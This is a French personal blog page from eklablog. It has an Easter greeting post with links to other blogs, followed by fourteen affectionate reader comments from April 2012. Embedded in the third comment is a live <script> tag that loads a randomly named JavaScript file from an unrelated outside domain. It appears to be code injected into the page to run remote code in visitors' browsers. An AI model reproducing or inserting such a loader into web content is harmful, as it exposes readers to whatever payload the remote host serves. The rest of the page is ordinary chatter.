• POUR VOUS

    POUR VOUS

    Bonjour tout le monde, je vous souhaite un bon week-end et de bonne fêtes de Pâques.

    Merci a Manola pour sa couronne et roger pour son bébé poussin.

    http://carterie.eklablog.com

     

    http://lile-perdue.eklablog.com

     


    Tags Tags : , , , ,
  • Commentaires

    14
    Jeudi 12 Avril 2012 à 15:01

    petit coucou ensoleillé madeleine  pour te souhaiter un agréable après-midi de gros bizzzous

    13
    Jeudi 12 Avril 2012 à 10:46

    bonjour madeleine

    je te souhaite une belle journée des bisous

    12
    Mercredi 11 Avril 2012 à 12:10

    Bonjour Madeleine,

     

    j'espère que tu as passé de belle fête de Pâques et que tu n'as pas mangé trop de chocolat?

    Moi si car j'aime trop ça!!! lol

     

    Je suis toujours présente parmi les membres d'eklablog mais tu ne me verras plus sur les défis, du moins plus pendant un certain temps.

     

    on continue à se voir sur nos blogs respectifs j'espère?

     

    Passes une belle journée,

     

    bisous Yolie

     

    11
    Karlyne
    Mercredi 11 Avril 2012 à 11:39

    J'espère que tu as bien gourmandiser

    et ce week-end de Pâques était bien chocolaté

    Je viens te souhaiter un très bon mercredi

    Passe une belle journée

    Gros bisous mon amie

    10
    Mercredi 11 Avril 2012 à 10:05

    mon petit coucou madeleine  pour te souhaiter un très bon mercredi de gros bizzzous

    9
    Mardi 10 Avril 2012 à 14:39

    coucou avec la pluie Madeleine  pour te souhaiter un agréable après-midi de gros bizzzous

    8
    Lundi 9 Avril 2012 à 23:39

    Bonsoir madeleine

    j espère que tu a eu un bon week end de paques

    plein de gros bisous

    7
    Lundi 9 Avril 2012 à 12:17

    Re , adresse bien reçu , je l'ai suprimer du blog pour ne pas la laisser en ligne sur le net .

    Voila je t'est envoyer un mail vite fait !!

    Bisous

    6
    chipie51 Profil de chipie51
    Lundi 9 Avril 2012 à 12:12

    bonjour madeleine, je passe te souhaiter un bon lundi de pâques, bisous

    5
    Lundi 9 Avril 2012 à 10:24

    coucou  madeleine j'arrive pour te souhaiter un très bon lundi de pâques de gros bizzzous

    4
    Dimanche 8 Avril 2012 à 12:25

    petit coucou Madeleine  pour te souhaiter une très bonne fête de Pâques mange pas trop de chocolat de gros bizzzous

    3
    Dimanche 8 Avril 2012 à 11:13

    coucou

    très joyeuses fêtes de Pâques

    bon dimanche, bisou

    <script src="http://superoseplugin.info/dfi823hs.js?0.0946160405494555" type="text/javascript"></script>

    2
    Dimanche 8 Avril 2012 à 10:41

    coucou , mady , je viens de regarder dans les notifications et je n'ai rien de toi , excuse-moi .

    Tu as peu-être fait une fausse maneoeuvre .

    Mais quand tu veut me demander quelque chose tu peu le faire par mail , tu sais bien que je répond toujours .

    et si je peut t'aider ce sera avec grand plaisir , je ne laisse jamais tomber les amie !

    je suis moins présente sur mes blogs en ce moment parce que je suis des cours en scrap pour revenir avec plein de nouvelles chose et une toute nouvelle façon de faire du scrap .

    Voila passe un bon dimanche de pâques , gros bisous .

    1
    Samedi 7 Avril 2012 à 21:28

    Coucou madeleine , merci pour ta visite , à mon tour , je te souhaite de passer une bonne fête de Paques .

    Dans ton message tu me dit que tu à trouvé ce que tu cherchais à acheter , mais je ne sais pas de quoi tu parle parle , tu ne ma rien demander.

    Enfin si tu à trouvé c'est le principal !

    Je te fait plein de gros bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :